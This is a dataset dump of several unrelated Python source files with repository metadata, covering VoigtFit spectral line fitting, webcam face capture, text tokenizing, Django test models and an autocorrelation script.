dataset.add_line('CrII_2066')
dataset.add_line('CrII_2026')
dataset.add_line('ZnII_2026')
dataset.add_line('MgI_2026')
dataset.add_line('MgI_2852')
### If a line has been defined, and you don't want to fit it
### it can either be removed from the dataset completely:
#dataset.remove_line('CrII_2056')
### or deactivated:
#dataset.deactivate_line('FeII_2374')
### A deactivated line is still present in the dataset,
### but not included in the fit. The line may still show up in the final figure.
### Define components to fit:
# dataset.reset_components()
### Add velocity components for each ion:
# ion z b logN
dataset.add_component('FeII', 1.793532, 20, 14.3, var_z=1)
dataset.add_component('FeII', 1.794060, 20, 15.0, var_z=1)
dataset.add_component('FeII', 1.794282, 20, 14.3, var_z=1)
dataset.add_component('FeII', 1.794722, 20, 14.3, var_z=1)
dataset.add_component('FeII', 1.795121, 15, 14.5, var_z=1, var_b=1)
#
# Options for the components:
# var_z=1/0 vary redshift for this component
# var_b=1/0 vary b-parameter for this component
# var_N=1/0 vary column density for this component
#
# Redshift and b-parameters can be tied.
# passing the option 'tie_z=z0_FeII' ties the redshift to the first component of FeII
# passing the option 'tie_b=b2_SiII' ties the b-parameter to the third component of SiII
#
# NOTE - the ion must be defined and the component index starts with 0
#
# The entire velocity structure can be copied from one ion to another:
dataset.copy_components(from_ion='FeII', to_ion='ZnII', logN=12.9, ref_comp=1)
# This copies the five components defined for FeII to ZnII and keeps
# the same pattern of initial guesses for column density.
# By giving ref_comp and logN, this intial guess pattern is scaled such
# that the second component has logN=12.9
#
# Individual components which are not observed for weaker lines can be removed:
#dataset.delete_component('ZnII', 4) # the index '4' refers to the fifth component
#dataset.delete_component('ZnII', 3)
#dataset.delete_component('ZnII', 2)
#dataset.delete_component('ZnII', 1)
#dataset.delete_component('ZnII', 0)
# NOTE - components should be deleted from last component to first component
# not the other way around as that messes up the component numbering.
dataset.copy_components(to_ion='CrII', from_ion='FeII', logN=13.6, ref_comp=1)
dataset.copy_components(to_ion='MgI', from_ion='FeII', logN=12.4, ref_comp=1)
# Crucial step:
dataset.prepare_dataset()
# Run the fit:
popt, chi2 = dataset.fit()
# Output best-fit parameters, total column densities and make plot:
dataset.plot_fit()
if logNHI:
dataset.print_metallicity(*logNHI)
dataset.print_total()
### The best-fit parameters can be accessed from the .best_fit attribute:
#logN0 = dataset.best_fit['logN0_FeII'].value
#logN0_err = dataset.best_fit['logN0_FeII'].stderr
#b1 = dataset.best_fit['b1_FeII'].value
#b1_err = dataset.best_fit['b1_FeII'].stderr
# Or you can create a list of all values:
#logN_FeII = [dataset.best_fit['logN%i_FeII' % num].value for num in range(len(dataset.components['FeII']))]
#logN_err_FeII = [dataset.best_fit['logN%i_FeII' % num].stderr for num in range(len(dataset.components['FeII']))]
dataset.save('example_fit.hdf5')
### The dataset which was defined above can be loaded like this:
# dataset = VoigtFit.load_dataset('example_fit.hdf5')
| 36.168067 | 113 | 0.745818 | import numpy as np
import VoigtFit
### Fit DLA towards quasar Q1313+1441
### Observed in X-shooter P089.A-0068
z_DLA = 1.7941
logNHI = 21.3, 0.1 # value, uncertainty
# If log(NHI) is not known use:
#logNHI = None
#### Load UVB and VIS data:
UVB_fname = 'data/test_UVB_1d.spec'
res_UVB = 8000
VIS_fname = 'data/test_VIS_1d.spec'
res_VIS = 11800
wl_uvb, spec_uvb, err_uvb = np.loadtxt(UVB_fname, unpack=True)
wl_vis, spec_vis, err_vis = np.loadtxt(VIS_fname, unpack=True)
# Alternatively, load a FITS spectrum (either a FITS table or array):
# wl, flux, err, mask, header = VoigtFit.io.load_fits_spectrum(fname)
dataset = VoigtFit.DataSet(z_DLA)
dataset.add_data(wl_uvb, spec_uvb, 299792./res_UVB, err=err_uvb, normalized=False)
dataset.add_data(wl_vis, spec_vis, 299792./res_VIS, err=err_vis, normalized=False)
### Define absorption lines:
dataset.add_line('FeII_2374')
dataset.add_line('FeII_2260')
dataset.add_line('CrII_2056')
dataset.add_line('CrII_2066')
dataset.add_line('CrII_2026')
dataset.add_line('ZnII_2026')
dataset.add_line('MgI_2026')
dataset.add_line('MgI_2852')
### If a line has been defined, and you don't want to fit it
### it can either be removed from the dataset completely:
#dataset.remove_line('CrII_2056')
### or deactivated:
#dataset.deactivate_line('FeII_2374')
### A deactivated line is still present in the dataset,
### but not included in the fit. The line may still show up in the final figure.
### Define components to fit:
# dataset.reset_components()
### Add velocity components for each ion:
# ion z b logN
dataset.add_component('FeII', 1.793532, 20, 14.3, var_z=1)
dataset.add_component('FeII', 1.794060, 20, 15.0, var_z=1)
dataset.add_component('FeII', 1.794282, 20, 14.3, var_z=1)
dataset.add_component('FeII', 1.794722, 20, 14.3, var_z=1)
dataset.add_component('FeII', 1.795121, 15, 14.5, var_z=1, var_b=1)
#
# Options for the components:
# var_z=1/0 vary redshift for this component
# var_b=1/0 vary b-parameter for this component
# var_N=1/0 vary column density for this component
#
# Redshift and b-parameters can be tied.
# passing the option 'tie_z=z0_FeII' ties the redshift to the first component of FeII
# passing the option 'tie_b=b2_SiII' ties the b-parameter to the third component of SiII
#
# NOTE - the ion must be defined and the component index starts with 0
#
# The entire velocity structure can be copied from one ion to another:
dataset.copy_components(from_ion='FeII', to_ion='ZnII', logN=12.9, ref_comp=1)
# This copies the five components defined for FeII to ZnII and keeps
# the same pattern of initial guesses for column density.
# By giving ref_comp and logN, this intial guess pattern is scaled such
# that the second component has logN=12.9
#
# Individual components which are not observed for weaker lines can be removed:
#dataset.delete_component('ZnII', 4) # the index '4' refers to the fifth component
#dataset.delete_component('ZnII', 3)
#dataset.delete_component('ZnII', 2)
#dataset.delete_component('ZnII', 1)
#dataset.delete_component('ZnII', 0)
# NOTE - components should be deleted from last component to first component
# not the other way around as that messes up the component numbering.
dataset.copy_components(to_ion='CrII', from_ion='FeII', logN=13.6, ref_comp=1)
dataset.copy_components(to_ion='MgI', from_ion='FeII', logN=12.4, ref_comp=1)
# Crucial step:
dataset.prepare_dataset()
# Run the fit:
popt, chi2 = dataset.fit()
# Output best-fit parameters, total column densities and make plot:
dataset.plot_fit()
if logNHI:
dataset.print_metallicity(*logNHI)
dataset.print_total()
### The best-fit parameters can be accessed from the .best_fit attribute:
#logN0 = dataset.best_fit['logN0_FeII'].value
#logN0_err = dataset.best_fit['logN0_FeII'].stderr
#b1 = dataset.best_fit['b1_FeII'].value
#b1_err = dataset.best_fit['b1_FeII'].stderr
# Or you can create a list of all values:
#logN_FeII = [dataset.best_fit['logN%i_FeII' % num].value for num in range(len(dataset.components['FeII']))]
#logN_err_FeII = [dataset.best_fit['logN%i_FeII' % num].stderr for num in range(len(dataset.components['FeII']))]
dataset.save('example_fit.hdf5')
### The dataset which was defined above can be loaded like this:
# dataset = VoigtFit.load_dataset('example_fit.hdf5')
| 0 | 0 | 0 |
f6f7df60b9e4598c503b7ba14cfaa26f0c4b5828 | 1,098 | py | Python | add_person.py | tomasrasymas/face-recognition-python | 52da6697fb775cfcd0a7e1511b356f6fd9908678 | [
"MIT"
] | null | null | null | add_person.py | tomasrasymas/face-recognition-python | 52da6697fb775cfcd0a7e1511b356f6fd9908678 | [
"MIT"
] | null | null | null | add_person.py | tomasrasymas/face-recognition-python | 52da6697fb775cfcd0a7e1511b356f6fd9908678 | [
"MIT"
] | null | null | null | import os
import cv2
import face_detector
import config
if __name__ == '__main__':
camera = cv2.VideoCapture(0)
cv2.namedWindow("preview")
person_name = input('Person name: ').lower()
person_folder = os.path.join(config.original_images_path, person_name)
if not os.path.exists(person_folder):
os.mkdir(person_folder)
counter = 0
timer = 0
while counter < config.number_of_faces and camera.isOpened():
ret, frame = camera.read()
faces = face_detector.detect_faces_dlib(frame)
if len(faces):
face = faces[0]
if timer % 200 == 50:
cv2.imwrite(os.path.join(person_folder, '%s.jpg' % counter), frame)
counter += 1
face_detector.draw_text(frame, face, str(counter))
face_detector.draw_rectangle(frame, face)
cv2.imshow('Camera image', frame)
if cv2.waitKey(20) & 0xFF == 27:
break
timer += 50
camera.release()
cv2.destroyAllWindows() | 24.954545 | 87 | 0.571949 | import os
import cv2
import face_detector
import config
if __name__ == '__main__':
camera = cv2.VideoCapture(0)
cv2.namedWindow("preview")
person_name = input('Person name: ').lower()
person_folder = os.path.join(config.original_images_path, person_name)
if not os.path.exists(person_folder):
os.mkdir(person_folder)
counter = 0
timer = 0
while counter < config.number_of_faces and camera.isOpened():
ret, frame = camera.read()
faces = face_detector.detect_faces_dlib(frame)
if len(faces):
face = faces[0]
if timer % 200 == 50:
cv2.imwrite(os.path.join(person_folder, '%s.jpg' % counter), frame)
counter += 1
face_detector.draw_text(frame, face, str(counter))
face_detector.draw_rectangle(frame, face)
cv2.imshow('Camera image', frame)
if cv2.waitKey(20) & 0xFF == 27:
break
timer += 50
camera.release()
cv2.destroyAllWindows() | 0 | 0 | 0 |
3e246085f72d7330f51f46130b2cc931e524e49e | 3,261 | py | Python | nlptoolkit/nlp.py | jeroyang/nlptoolkit | d788fa9011133dca86823b590d23070883e59918 | [
"MIT"
] | null | null | null | nlptoolkit/nlp.py | jeroyang/nlptoolkit | d788fa9011133dca86823b590d23070883e59918 | [
"MIT"
] | null | null | null | nlptoolkit/nlp.py | jeroyang/nlptoolkit | d788fa9011133dca86823b590d23070883e59918 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# <nbformat>3.0</nbformat>
# <codecell>
import re
from itertools import chain, combinations
def clause_tokenize(sentence):
"""Split on comma or parenthesis, if there are more then three words for each clause"""
clause_re = re.compile(r'((?:\S+\s){2,}\S+,|(?:\S+\s){3,}(?=\((?:\S+\s){2,}\S+\)))')
clause_stem = clause_re.sub(r'\1###clausebreak###', sentence)
return [c for c in clause_stem.split('###clausebreak###') if c!='']
def word_tokenize(sentence):
"""Cut the sentence in into tokens without deleting anything"""
number_pattern = ['\d+\.\d+']
arr_pattern = ['(?: \w\.){2,3}|(?:\A|\s)(?:\w\.){2,3}|[A-Z]\. [a-z]']
escape_re = re.compile("|".join(number_pattern + arr_pattern))
escapes = escape_re.findall(sentence)
escaped_stem = escape_re.sub('protectprotectprotect', sentence)
word_stem = re.sub("([%s])" % re.escape('!"#$%&()*,./:;<=>?@[\]^_`{|}~'), r' \1 ', escaped_stem)
escaped_word_stem = word_stem.replace('{','{{').replace('}', '}}')
result = escaped_word_stem.replace('protectprotectprotect', '{}').format(*escapes)
return [r.strip() for r in result.split(' ') if r != '']
def slim_stem(token):
"""A very simple stemmer, for entity of GO stemming"""
target_subfixs = ['ic', 'tic', 'e', 'ive', 'ing', 'ical', 'nal', 'al', 'ism', 'ion', 'ation', 'ar', 'sis', 'us', 'ment']
for subfix in sorted(target_subfixs, key=len, reverse=True):
idx = token.find(subfix)
if idx != -1 and idx == len(token)-len(subfix):
return token[0:-len(subfix)]
return token
def powerset(iterable):
"powerset([1,2,3]) --> () (1,) (2,) (3,) (1,2) (1,3) (2,3) (1,2,3)"
s = list(iterable)
return chain.from_iterable(combinations(s, r) for r in range(len(s)+1))
def ngram(n, iter_tokens):
"""Return a generator of n-gram from an iterable"""
z = len(iter_tokens)
return (iter_tokens[i:i+n] for i in xrange(z-n+1))
def power_ngram(iter_tokens):
"""Generate unigram, bigram, trigram ... and the max-gram,
different from powerset(), this function will not generate skipped combinations such as (1,3)"""
return chain.from_iterable(ngram(j, iter_tokens) for j in xrange(1, len(iter_tokens)))
| 45.929577 | 134 | 0.59399 | # -*- coding: utf-8 -*-
# <nbformat>3.0</nbformat>
# <codecell>
import re
from itertools import chain, combinations
def sent_tokenize(context):
paired_symbols = [("(", ")"),
("[", "]"),
("{", "}")]
paired_patterns = ["%s.*?%s" % (re.escape(lt), re.escape(rt)) for lt, rt in paired_symbols]
number_pattern = ['\d+\.\d+']
arr_pattern = ['(?: \w\.){2,3}|(?:\A|\s)(?:\w\.){2,3}|[A-Z]\. [a-z]|\svs\. |et al\.|Fig\. \d|approx\.|(?:Prof|Dr)\. (?:[A-Z]\.)?']
escape_re = re.compile("|".join(paired_patterns + number_pattern + arr_pattern))
escapes = escape_re.findall(context)
escaped_stem = escape_re.sub('{}', context)
escaped_escaped_stem = escaped_stem.replace('{','{{').replace('}', '}}')
sent_re = re.compile(r'([A-Z0-9]..+?(?:[.!?]\s|[\n$]))')
sent_stem = sent_re.sub(r'\1###linebreak###', escaped_escaped_stem)
recovered_sent_stem = sent_stem.replace('{{}}', '{}')
result = recovered_sent_stem.format(*escapes)
return [r.strip() for r in result.split('###linebreak###') if r != '']
def sent_count(context):
return len(sent_tokenize(context))
def clause_tokenize(sentence):
"""Split on comma or parenthesis, if there are more then three words for each clause"""
clause_re = re.compile(r'((?:\S+\s){2,}\S+,|(?:\S+\s){3,}(?=\((?:\S+\s){2,}\S+\)))')
clause_stem = clause_re.sub(r'\1###clausebreak###', sentence)
return [c for c in clause_stem.split('###clausebreak###') if c!='']
def word_tokenize(sentence):
"""Cut the sentence in into tokens without deleting anything"""
number_pattern = ['\d+\.\d+']
arr_pattern = ['(?: \w\.){2,3}|(?:\A|\s)(?:\w\.){2,3}|[A-Z]\. [a-z]']
escape_re = re.compile("|".join(number_pattern + arr_pattern))
escapes = escape_re.findall(sentence)
escaped_stem = escape_re.sub('protectprotectprotect', sentence)
word_stem = re.sub("([%s])" % re.escape('!"#$%&()*,./:;<=>?@[\]^_`{|}~'), r' \1 ', escaped_stem)
escaped_word_stem = word_stem.replace('{','{{').replace('}', '}}')
result = escaped_word_stem.replace('protectprotectprotect', '{}').format(*escapes)
return [r.strip() for r in result.split(' ') if r != '']
def slim_stem(token):
"""A very simple stemmer, for entity of GO stemming"""
target_subfixs = ['ic', 'tic', 'e', 'ive', 'ing', 'ical', 'nal', 'al', 'ism', 'ion', 'ation', 'ar', 'sis', 'us', 'ment']
for subfix in sorted(target_subfixs, key=len, reverse=True):
idx = token.find(subfix)
if idx != -1 and idx == len(token)-len(subfix):
return token[0:-len(subfix)]
return token
def powerset(iterable):
"powerset([1,2,3]) --> () (1,) (2,) (3,) (1,2) (1,3) (2,3) (1,2,3)"
s = list(iterable)
return chain.from_iterable(combinations(s, r) for r in range(len(s)+1))
def ngram(n, iter_tokens):
"""Return a generator of n-gram from an iterable"""
z = len(iter_tokens)
return (iter_tokens[i:i+n] for i in xrange(z-n+1))
def power_ngram(iter_tokens):
"""Generate unigram, bigram, trigram ... and the max-gram,
different from powerset(), this function will not generate skipped combinations such as (1,3)"""
return chain.from_iterable(ngram(j, iter_tokens) for j in xrange(1, len(iter_tokens)))
| 974 | 0 | 46 |
ab1daa3d066e1ffb657c4f2921c471c9002bf834 | 234 | py | Python | poc/classes/AuxSTExtension.py | bookofproofs/fpl | 527b43b0f8bb3d459ee906e5ed8524a676ce3a2c | [
"MIT"
] | 4 | 2021-11-08T10:09:46.000Z | 2021-11-13T22:25:46.000Z | poc/classes/AuxSTExtension.py | bookofproofs/fpl | 527b43b0f8bb3d459ee906e5ed8524a676ce3a2c | [
"MIT"
] | 1 | 2020-09-04T13:02:09.000Z | 2021-06-16T07:07:44.000Z | poc/classes/AuxSTExtension.py | bookofproofs/fpl | 527b43b0f8bb3d459ee906e5ed8524a676ce3a2c | [
"MIT"
] | 1 | 2021-11-08T10:10:12.000Z | 2021-11-08T10:10:12.000Z | from poc.classes.AuxST import AuxST
from poc.classes.AuxSymbolTable import AuxSymbolTable
| 21.272727 | 55 | 0.726496 | from poc.classes.AuxST import AuxST
from poc.classes.AuxSymbolTable import AuxSymbolTable
class AuxSTExtension(AuxST):
def __init__(self, i):
super().__init__(AuxSymbolTable.block_axiom, i)
self.extension = ""
| 85 | 7 | 50 |
2bc64e80bf72ed0f849deeb18ccd8a8117379138 | 1,517 | py | Python | sols/111.py | Paul11100/LeetCode | 9896c579dff1812c0c76964db8d60603ee715e35 | [
"MIT"
] | null | null | null | sols/111.py | Paul11100/LeetCode | 9896c579dff1812c0c76964db8d60603ee715e35 | [
"MIT"
] | null | null | null | sols/111.py | Paul11100/LeetCode | 9896c579dff1812c0c76964db8d60603ee715e35 | [
"MIT"
] | null | null | null | from collections import deque
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
# BFS (Accepted), O(n) time, O(n) space
# # BFS (Top Voted), O(n) time, O(n) space
# def minDepth(self, root: TreeNode) -> int:
# if not root:
# return 0
# queue = collections.deque([(root, 1)])
# while queue:
# node, level = queue.popleft()
# if node:
# if not node.left and not node.right:
# return level
# else:
# queue.append((node.left, level+1))
# queue.append((node.right, level+1))
# # DFS (Top Voted), O(n) time, O(n) space
# def minDepth(self, root: TreeNode) -> int:
# if not root: return 0
# d = list(map(self.minDepth, (root.left, root.right)))
# return 1 + (min(d) or max(d))
| 32.276596 | 63 | 0.507581 | from collections import deque
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
# BFS (Accepted), O(n) time, O(n) space
def minDepth(self, root: TreeNode) -> int:
queue = deque()
if root:
queue.append((root, 1))
else:
return 0
while queue:
cur_node, depth = queue.popleft()
if not cur_node.left and not cur_node.right:
return depth
if cur_node.left:
queue.append((cur_node.left, depth + 1))
if cur_node.right:
queue.append((cur_node.right, depth + 1))
# # BFS (Top Voted), O(n) time, O(n) space
# def minDepth(self, root: TreeNode) -> int:
# if not root:
# return 0
# queue = collections.deque([(root, 1)])
# while queue:
# node, level = queue.popleft()
# if node:
# if not node.left and not node.right:
# return level
# else:
# queue.append((node.left, level+1))
# queue.append((node.right, level+1))
# # DFS (Top Voted), O(n) time, O(n) space
# def minDepth(self, root: TreeNode) -> int:
# if not root: return 0
# d = list(map(self.minDepth, (root.left, root.right)))
# return 1 + (min(d) or max(d))
| 462 | -6 | 49 |
8405fff54c92d57f94de1396e91c12fad7fcdf98 | 3,035 | py | Python | automated_logging/tests/models.py | rewardz/django-automated-logging | 3f7c578b42de1e5ddc72cac79014715fc7dffa46 | [
"MIT"
] | 31 | 2018-02-19T08:06:00.000Z | 2021-08-11T14:42:51.000Z | automated_logging/tests/models.py | rewardz/django-automated-logging | 3f7c578b42de1e5ddc72cac79014715fc7dffa46 | [
"MIT"
] | 11 | 2018-09-08T21:11:52.000Z | 2021-09-24T15:49:36.000Z | automated_logging/tests/models.py | rewardz/django-automated-logging | 3f7c578b42de1e5ddc72cac79014715fc7dffa46 | [
"MIT"
] | 11 | 2018-02-18T14:56:04.000Z | 2021-06-23T09:16:17.000Z | import uuid
from django.db.models import (
Model,
UUIDField,
DateTimeField,
ManyToManyField,
CASCADE,
ForeignKey,
OneToOneField,
CharField,
)
from automated_logging.decorators import exclude_model, include_model
class TestBase(Model):
""" Base for all the test models """
id = UUIDField(default=uuid.uuid4, primary_key=True)
created_at = DateTimeField(auto_now_add=True)
updated_at = DateTimeField(auto_now=True)
class OrdinaryBaseTest(TestBase):
""" Ordinary base test. Has a random char field."""
random = CharField(max_length=255, null=True)
random2 = CharField(max_length=255, null=True)
class OrdinaryTest(OrdinaryBaseTest):
""" Ordinary test. Has a random char field."""
class M2MTest(TestBase):
""" Used to test the Many-To-Many Relationship functionality of DAL"""
relationship = ManyToManyField(OrdinaryTest)
class ForeignKeyTest(TestBase):
""" Used to test ForeignKey functionality of DAL."""
relationship = ForeignKey(OrdinaryTest, on_delete=CASCADE, null=True)
class OneToOneTest(TestBase):
""" Used to test the One-To-One Relationship functionality of DAL."""
relationship = OneToOneField(OrdinaryTest, on_delete=CASCADE, null=True)
class SpeedTest(TestBase):
""" Used to test the speed of DAL """
for idx in range(100):
exec(f"column{idx} = CharField(max_length=15, null=True)")
class FullClassBasedExclusionTest(OrdinaryBaseTest):
""" Used to test the full model exclusion via meta class"""
class PartialClassBasedExclusionTest(OrdinaryBaseTest):
""" Used to test partial ignore via fields """
@exclude_model
class FullDecoratorBasedExclusionTest(OrdinaryBaseTest):
""" Used to test full decorator exclusion """
@exclude_model(operations=['delete'], fields=['random'])
class PartialDecoratorBasedExclusionTest(OrdinaryBaseTest):
""" Used to test partial decorator exclusion """
@include_model
class DecoratorOverrideExclusionTest(OrdinaryBaseTest):
"""
Used to check if include_model
has precedence over class based configuration
"""
| 22.819549 | 76 | 0.689951 | import uuid
from django.db.models import (
Model,
UUIDField,
DateTimeField,
ManyToManyField,
CASCADE,
ForeignKey,
OneToOneField,
CharField,
)
from automated_logging.decorators import exclude_model, include_model
class TestBase(Model):
""" Base for all the test models """
id = UUIDField(default=uuid.uuid4, primary_key=True)
created_at = DateTimeField(auto_now_add=True)
updated_at = DateTimeField(auto_now=True)
class Meta:
abstract = True
app_label = 'automated_logging'
class OrdinaryBaseTest(TestBase):
""" Ordinary base test. Has a random char field."""
random = CharField(max_length=255, null=True)
random2 = CharField(max_length=255, null=True)
class Meta:
abstract = True
app_label = 'automated_logging'
class OrdinaryTest(OrdinaryBaseTest):
""" Ordinary test. Has a random char field."""
class Meta:
app_label = 'automated_logging'
class M2MTest(TestBase):
""" Used to test the Many-To-Many Relationship functionality of DAL"""
relationship = ManyToManyField(OrdinaryTest)
class Meta:
app_label = 'automated_logging'
class ForeignKeyTest(TestBase):
""" Used to test ForeignKey functionality of DAL."""
relationship = ForeignKey(OrdinaryTest, on_delete=CASCADE, null=True)
class Meta:
app_label = 'automated_logging'
class OneToOneTest(TestBase):
""" Used to test the One-To-One Relationship functionality of DAL."""
relationship = OneToOneField(OrdinaryTest, on_delete=CASCADE, null=True)
class Meta:
app_label = 'automated_logging'
class SpeedTest(TestBase):
""" Used to test the speed of DAL """
for idx in range(100):
exec(f"column{idx} = CharField(max_length=15, null=True)")
class Meta:
app_label = 'automated_logging'
class FullClassBasedExclusionTest(OrdinaryBaseTest):
""" Used to test the full model exclusion via meta class"""
class Meta:
app_label = 'automated_logging'
class LoggingIgnore:
complete = True
class PartialClassBasedExclusionTest(OrdinaryBaseTest):
""" Used to test partial ignore via fields """
class Meta:
app_label = 'automated_logging'
class LoggingIgnore:
fields = ['random']
operations = ['delete']
@exclude_model
class FullDecoratorBasedExclusionTest(OrdinaryBaseTest):
""" Used to test full decorator exclusion """
class Meta:
app_label = 'automated_logging'
@exclude_model(operations=['delete'], fields=['random'])
class PartialDecoratorBasedExclusionTest(OrdinaryBaseTest):
""" Used to test partial decorator exclusion """
class Meta:
app_label = 'automated_logging'
@include_model
class DecoratorOverrideExclusionTest(OrdinaryBaseTest):
"""
Used to check if include_model
has precedence over class based configuration
"""
class Meta:
app_label = 'automated_logging'
class LoggingIgnore:
complete = True
| 0 | 513 | 405 |
c064039faf659c2d777c4940242feee054cd300d | 24 | py | Python | src/utils/__version__.py | kevin3/cwl-ica | cf706ea42993d563f364c0847ee4b882f8fe067c | [
"MIT"
] | 8 | 2021-12-08T05:33:58.000Z | 2022-03-07T00:40:48.000Z | src/utils/__version__.py | kevin3/cwl-ica | cf706ea42993d563f364c0847ee4b882f8fe067c | [
"MIT"
] | 34 | 2021-08-11T03:59:33.000Z | 2022-03-10T05:39:26.000Z | src/utils/__version__.py | kevin3/cwl-ica | cf706ea42993d563f364c0847ee4b882f8fe067c | [
"MIT"
] | 1 | 2022-01-08T07:34:55.000Z | 2022-01-08T07:34:55.000Z | version = "__VERSION__"
| 12 | 23 | 0.75 | version = "__VERSION__"
| 0 | 0 | 0 |
6e2107cf51e389f1a13fc9e21fc4ac6ecc14ba63 | 2,105 | py | Python | sherlock_scripts/pythonhops/sherlock_jacf.py | apoletayev/anomalous_ion_conduction | badb91e971e4a5263a433cfa9fcbf914d53ed2a1 | [
"MIT"
] | 2 | 2021-05-20T03:49:51.000Z | 2021-06-21T08:41:10.000Z | sherlock_scripts/pythonhops/sherlock_jacf.py | apoletayev/anomalous_ion_conduction | badb91e971e4a5263a433cfa9fcbf914d53ed2a1 | [
"MIT"
] | null | null | null | sherlock_scripts/pythonhops/sherlock_jacf.py | apoletayev/anomalous_ion_conduction | badb91e971e4a5263a433cfa9fcbf914d53ed2a1 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Aug 27 10:55:08 2020
@author: andreypoletaev
Assumptions made:
time is in picoseconds, timestep is 1 fs
"""
# =============================================================================
# %% Imports & constants
# =============================================================================
import sys
from hop_utils import autocorrelation
import pandas as pd
## column names for the cases that the file is a CoM file or a single-atom velocity file
com_col_names = ['timestep', 'x', 'y', 'z', 'vx', 'vy', 'vz']
vel_col_names = ['atom_id', 'time', 'vx', 'vy', 'vz']
# =============================================================================
# %% Parse inputs
# =============================================================================
## Parse inputs. Format: key=value
options = dict([ (x.split('=')[0],x.split('=')[1]) for x in sys.argv[1:] ])
# print(options)
assert 'file' in list(options.keys()) and 'duration' in list(options.keys()), \
'please pass file=... [path] and duration=... [psec] as command-line options'
col_names = vel_col_names
header = 0
if ('com' not in list(options.keys())) or (eval(options['com']) == True) :
col_names = com_col_names
header = 2
fin = pd.read_csv(options['file'], sep=' ', skiprows=header, names=col_names, index_col=False)
# print(fin.head(5))
## convert time from [steps] to [ps] if the input file has the former
try : fin['time'] = fin.timestep / 1000. ## hard-coded conversion from steps to picoseconds
except : pass
fin.set_index('time', inplace=True)
# folder = '/'.join(options['file'].split('/')[:-1])
# fn = options['file'].split('/')[-1]
dur = int(options['duration'])
fout = options['file_out']
## do the actual computation of the autocorrelation function
print(f'computing {options["file"]}')
jacf = autocorrelation(fin, dur, ['x','y','z'], verbose=True, to_file=fout).reset_index().rename(columns={'index':'time'})
# jacf.to_csv(folder+'/'+fn[3:-4]+f'_{dur}ps.csv', index=False)
print(f'computed and saved {options["file"]}') | 32.384615 | 122 | 0.55772 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Aug 27 10:55:08 2020
@author: andreypoletaev
Assumptions made:
time is in picoseconds, timestep is 1 fs
"""
# =============================================================================
# %% Imports & constants
# =============================================================================
import sys
from hop_utils import autocorrelation
import pandas as pd
## column names for the cases that the file is a CoM file or a single-atom velocity file
com_col_names = ['timestep', 'x', 'y', 'z', 'vx', 'vy', 'vz']
vel_col_names = ['atom_id', 'time', 'vx', 'vy', 'vz']
# =============================================================================
# %% Parse inputs
# =============================================================================
## Parse inputs. Format: key=value
options = dict([ (x.split('=')[0],x.split('=')[1]) for x in sys.argv[1:] ])
# print(options)
assert 'file' in list(options.keys()) and 'duration' in list(options.keys()), \
'please pass file=... [path] and duration=... [psec] as command-line options'
col_names = vel_col_names
header = 0
if ('com' not in list(options.keys())) or (eval(options['com']) == True) :
col_names = com_col_names
header = 2
fin = pd.read_csv(options['file'], sep=' ', skiprows=header, names=col_names, index_col=False)
# print(fin.head(5))
## convert time from [steps] to [ps] if the input file has the former
try : fin['time'] = fin.timestep / 1000. ## hard-coded conversion from steps to picoseconds
except : pass
fin.set_index('time', inplace=True)
# folder = '/'.join(options['file'].split('/')[:-1])
# fn = options['file'].split('/')[-1]
dur = int(options['duration'])
fout = options['file_out']
## do the actual computation of the autocorrelation function
print(f'computing {options["file"]}')
jacf = autocorrelation(fin, dur, ['x','y','z'], verbose=True, to_file=fout).reset_index().rename(columns={'index':'time'})
# jacf.to_csv(folder+'/'+fn[3:-4]+f'_{dur}ps.csv', index=False)
print(f'computed and saved {options["file"]}') | 0 | 0 | 0 |
b13e94b4438f73055adcddf25912666ad6090be7 | 456 | py | Python | symptoms/admin.py | sjsafranek/symptom_tracker | 2e7d9ff3ed946ebbf18b366bbe79deb3b3c94a5c | [
"MIT"
] | null | null | null | symptoms/admin.py | sjsafranek/symptom_tracker | 2e7d9ff3ed946ebbf18b366bbe79deb3b3c94a5c | [
"MIT"
] | null | null | null | symptoms/admin.py | sjsafranek/symptom_tracker | 2e7d9ff3ed946ebbf18b366bbe79deb3b3c94a5c | [
"MIT"
] | null | null | null | from django.contrib import admin
from . import models
admin.site.register(models.Agency)
admin.site.register(models.Therapist)
admin.site.register(models.Client)
admin.site.register(models.ClientSymptom)
admin.site.register(models.Session)
admin.site.register(models.SymptomScore)
# from guardian.admin import GuardedModelAdmin
#
# class SymptomScoreAdmin(GuardedModelAdmin):
# pass
#
# admin.site.register(models.SymptomScore, SymptomScoreAdmin)
| 24 | 61 | 0.811404 | from django.contrib import admin
from . import models
admin.site.register(models.Agency)
admin.site.register(models.Therapist)
admin.site.register(models.Client)
admin.site.register(models.ClientSymptom)
admin.site.register(models.Session)
admin.site.register(models.SymptomScore)
# from guardian.admin import GuardedModelAdmin
#
# class SymptomScoreAdmin(GuardedModelAdmin):
# pass
#
# admin.site.register(models.SymptomScore, SymptomScoreAdmin)
| 0 | 0 | 0 |
40cd83ad44db70333ce38a5c61c142021c8a2fe6 | 6,037 | py | Python | models/algorithms/libfm_fastfm.py | ucds-sg/h2oai | 7042860767dc25d1a7d7122103bbd5016d02df53 | [
"Apache-2.0"
] | 194 | 2019-04-23T10:25:13.000Z | 2022-03-29T04:19:28.000Z | models/algorithms/libfm_fastfm.py | ucds-sg/h2oai | 7042860767dc25d1a7d7122103bbd5016d02df53 | [
"Apache-2.0"
] | 50 | 2019-06-24T20:17:51.000Z | 2022-03-16T20:05:37.000Z | models/algorithms/libfm_fastfm.py | ucds-sg/h2oai | 7042860767dc25d1a7d7122103bbd5016d02df53 | [
"Apache-2.0"
] | 85 | 2019-03-27T12:26:43.000Z | 2022-01-27T13:15:37.000Z | """LibFM implementation of fastFM """
import datatable as dt
import numpy as np
from sklearn.preprocessing import LabelEncoder
from h2oaicore.models import CustomModel
from sklearn.model_selection import StratifiedKFold
from sklearn.calibration import CalibratedClassifierCV
from sklearn.base import BaseEstimator, ClassifierMixin
from sklearn.preprocessing import StandardScaler
from scipy.sparse import csr_matrix
# paper: https://arxiv.org/abs/1505.00641
| 39.980132 | 109 | 0.563525 | """LibFM implementation of fastFM """
import datatable as dt
import numpy as np
from sklearn.preprocessing import LabelEncoder
